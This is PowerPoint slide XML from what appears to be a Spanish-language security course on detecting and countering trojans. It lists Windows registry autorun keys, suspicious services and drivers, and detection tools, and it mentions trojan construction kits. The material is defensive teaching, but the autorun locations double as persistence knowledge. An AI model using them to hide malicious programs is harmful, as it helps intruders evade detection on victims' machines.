        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28478076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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Escaneando Controladores de dispositivo sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los Troyanos del tipo drivers son generalmente descargados de fuentes no confiadas. Escanear y verificar que los dispositivos son de una fuente original o sitio original.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Herramientas: DriverView</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18587983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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>5. Escaneando Servicios de Windows sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Permite a los atacantes generar servicios de Windows permitiéndoles tener control remoto sobre el equipo de la víctima y pasar instrucciones maliciosas. Los troyanos renombran sus procesos para parecer servicios originales de Windows de esa manera impedir detección.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Los troyanos emplean técnicas rootkit para manipular HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services para esconder sus procesos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Herramientas: Windows Service Manager (SrvMan)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29142193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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Escaneando programas sospechosos de inicio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Primero revisar la carpeta Inicio para ver accesos directos de los programas que se inician automáticamente. Revisar los servicios de Windows que se inician automáticamente. Revisar los programas de inicio en el registro. Revisar controladores que se cargan automáticamente. Revisar el inicio del Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1078396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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Entradas del registro con relación al inicio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Explorer Startup Setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Common Startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31566107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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Windows Startup Setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7945769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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>IE Startup Setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKCU\Software\Microsoft\Internet Explorer\UrlSearchHooks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKLM\Software\Microsoft\Internet Explorer\Toolbar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKLM\Software\Microsoft\Internet Explorer\Extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKCU\Software\Microsoft\Internet Explorer\MenuExt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1294104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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Herramientas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Starter, Security AutoRun, What's Running? 2.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4114965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3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Generalmente busca información sobre: tarjetas de crédito, cuentas, documentos confidenciales, datos financieros, calendario, utilizar el equipo infectado para propósitos ilegales.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Su propósito</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="562692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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>7. Escaneando archivos y carpetas sospechosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los troyanos normalmente modificar los archivos y carpetas del sistema. Utilice estas herramientas para detectar los cambios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>, WinMD5 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15225703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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>FCIV: Es una aplicación de línea de comandos que computa los hashes (MD5 o SHA1) de los archivos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Tripwire: Sistema de clase empresarial verificador de integridad que escanea y reporta archivos del sistema críticos cambiados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Sigverif: Revisa la integridad de los archivos críticos que son firmados digitalmente por Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Otras herramientas: FastSu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9495203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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>8. Escaneando actividades de red sospechosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Se debe revisar puertos, tanto puertos no permitidos o comunes, como permitidos o comunes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>La herramienta Capsa Network Analyzer es una herramienta intuitiva, que provee información detallada para ayudar a revisar si hay actividades troyanas en la red.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36387099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Contramedidas para los troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Evitar descargar y ejecutar aplicaciones de fuentes no confiadas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Evitar abrir archivos adjuntos por mail de remitentes no conocidos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Instalar parches de seguridad y actualizaciones para los S.O. y aplicaciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Escanear CDS, DVDs, Discos, USB con antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21770626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Contramedidas para los troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. Evitar aceptar programas transferidos por programas de mensajería.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Bloquear puertos innecesarios en el equipo y firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>7. Fortalecer las configuraciones débiles por defecto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>8. Deshabilitar funcionalidades que no se utilizan, incluyendo protocolos y servicios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>9. Evitar ejecutar aplicaciones, scripts, etc. a ciegas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28151488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Contramedidas para los troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>10. Monitorear el tráfico interno de la red de puertos extraños o tráfico encriptado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>11. Administrar los archivos de integridad del sistema realizando revisiones, auditorías y escaneo de puertos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>12. Ejecutar versiones locales de antivirus, firewall e IDS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>13. Restringir permisos entre los ambientes de escritorio para prevenir la instalación de aplicaciones maliciosas. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0"/>
              <a:t>(cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3341133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Contramedidas para los troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Y especialmente ¡EDUCAR A LOS USUARIOS!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30909270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Contramedidas para los troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Trojan Horse Contruction Kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ayuda a los atacantes a crear sus propios troyanos. Estas herramientas pueden ser peligrosas si no se ejecutan apropiadamente. También pueden ser detectadas puesto que utilizan código redundante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Software Anti-Troyano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>TrojanHunter, Emsisoft Anti-Malware, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37630980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a:xfrm>
            <a:off x="323528" y="2636912"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Test de Intrusión para Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38931512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240287" y="541734"/>
            <a:ext cx="6738504" cy="5839593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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chemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
